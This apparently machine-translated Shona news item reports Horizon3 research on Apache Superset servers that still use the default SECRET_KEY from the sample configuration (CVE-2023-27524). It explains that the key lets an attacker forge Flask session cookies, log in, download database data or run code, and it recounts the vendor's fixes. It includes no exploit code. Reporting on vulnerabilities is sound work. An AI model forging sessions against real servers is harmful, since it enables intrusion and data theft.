Vatsvagiri kubva kuHorizon3 vaona nyaya dzekuchengetedza mune dzakawanda kuisirwa kweApache Superset data yekuongorora uye yekuona chikuva. 2124 ye3176 yeruzhinji Apache Superset maseva akaongororwa akawanikwa ari kushandisa generic encryption kiyi, inotsanangurwa nekusarudzika mumuenzaniso faira yekumisikidza. Kiyi iyi inoshandiswa neFlask Python raibhurari kugadzira makuki emusangano, zvichibvumira anorwisa neruzivo rwekiyi kuti agadzire fake session paramita, batanidza kune Apache Superset web interface, dhawunirodha data kubva kune akabatana dhatabhesi, kana kuita kodhi neApache Superset ropafadzo.
Sezvineiwo, vaongorori vakatanga kuzivisa nyaya kune vanogadzira kumashure muna 2021, mushure mezvo, mukuburitswa kweApache Superset 1.4.1, yakaburitswa muna Ndira 2022, kukosha kweSECRET_KEY parameter kwakatsiviwa netambo "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET" uye kukosha uku kwaizoiswa yambiro.
Muna Kukadzi wegore rino, vaongorori vakasarudza kudzokorora kuongorora masisitimu asina kusimba uye vakaona kuti vanhu vashoma vakateerera yambiro uye 67% servers Apache Superset inoramba ichishandisa makiyi kubva mumienzaniso yekugadzirisa, matemplate ekushandisa, kana magwaro. Zvisinei, mamwe makambani makuru, mayunivhesiti, uye masangano ehurumende ari pakati pemasangano anoshandisa makiyi ekare.
Kudoma kiyi yekushanda mukumisikidzwa kwemuenzaniso iko zvino kwave kutorwa sekusagadzikana (CVE-2023-27524), iyo yakagadziriswa muApache Superset 2.1 nekukanda chikanganiso chinovhara chikuva kubva pakuvhurwa kana kiyi yakatsanangurwa mumuenzaniso ichishandiswa. (Iyo chete kiyi inotsanangurwa mushanduro yezvino sampuli configuration inofungidzirwa; makiyi ekare ekare, makiyi kubva kumatemplate, uye zvinyorwa hazvina kuvharwa.) Chinyorwa chakakosha chinopiwa kuti utarise kusazvibata pane network.
Source: opennet.ru
